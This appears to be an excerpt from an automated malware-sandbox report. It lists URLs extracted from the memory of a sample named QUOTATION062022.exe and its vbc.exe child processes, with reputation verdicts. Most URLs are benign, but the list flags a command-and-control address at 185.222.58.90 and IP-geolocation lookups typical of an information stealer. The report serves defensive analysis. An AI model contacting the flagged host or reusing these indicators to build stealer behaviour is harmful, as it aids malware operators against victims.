http://service.r	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	false		high
http://ns.adobe.cobj_	vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://support.google.com/chrome/?p=plugin_wmp	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/6258784	vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentme	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/t_	vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_flash	vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/D	vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.c/g	vbc.exe, 00000004.00000003.377169989.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377236233.000000000D2C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377186734.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.366510707.000000000D2B1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_java	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://go.micros	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.c/g_	vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484560508.000000000734A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_real	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
http://185.222.58.90:17910	vbc.exe, 00000004.00000002.379436483.0000000007421000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_pdf	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab1	vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_divx	vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl	vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/0	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://forms.real.com/real/realone/download.html?type=rpsp_us	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://support.a	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io/ip%appdata%	vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_quicktime	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	false		high
http://ns.adobe.cobj	vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.datacontract.org/2004/07/	vbc.exe, 00000004.00000002.379532591.00000000074CE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://helpx.ad	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	false		high
http://tempuri.org/Endpoint/SetEnviron	vbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://get.adob	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	false		high
http://185.222.58.90:1	vbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://service.real.com/realplayer/security/02062012_player/en/	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_shockwave	vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ns.ado/1_	vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://forms.rea	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.222.58.90:179104	vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ns.ado/1	vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
